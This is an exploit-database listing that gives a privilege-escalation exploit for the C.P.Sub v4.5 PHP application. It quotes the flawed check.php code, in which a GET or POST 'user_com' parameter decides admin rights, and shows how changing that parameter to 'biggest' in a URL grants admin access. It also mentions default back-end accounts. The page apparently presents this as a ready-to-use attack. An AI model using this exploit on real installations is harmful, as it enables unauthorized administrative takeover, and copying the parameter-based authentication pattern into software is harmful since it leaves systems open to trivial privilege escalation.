[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

C.P.Sub 4.5 Privilege Escalation Exploit

Author
Chako
Risk
[
Security Risk High
]
0day-ID
0day-ID-20949
Category
web applications
Date add
30-06-2013
Platform
php
#!/usr/bin/python
#
#
####################################################################
#
# Exploit Title: C.P.Sub <= v4.5 Misconfiguration and Improper Authentication
# Date: 2013/6/27
# Exploit Author: Chako
# Vendor Homepage: http://www.cooltey.org/ping/php.php
# Software Download Link: http://cooltey.myweb.hinet.net/cpsub_v4.5.zip
# Version: <= v4.5
# Tested on: Windows 7 
#
#
####################################################################

Improper Authentication:
==========================================

Description:
    C.P.Sub <= v4.5 use "user_com=" parameter to identify if the user has admin privilege.
  Therefore an attacker could simply change the value for "user_com=" parameter to gain admin privilege.


/check.php (LINE: 36-44)
--------------------------------------------------------------
if($_GET[user_com] != "")
{
  $user_com = $_GET[user_com];
}elseif($_POST[user_com] != "")
{
  $user_com = $_POST[user_com];
}
if($user_com == "biggest")
{
--------------------------------------------------------------


Exploit:
--------------------------------------------------------------

change
http://Example_Target/info.php?cookie=yes&user_com=second

to
http://Example_Target/info.php?cookie=yes&user_com=biggest



Misconfiguration
==========================================
There are some default accounts for C.P.Sub <= v4.5 that allows an attacker
to access back-end management page. It could lead to further attack.

#  0day.today [2024-07-07]  #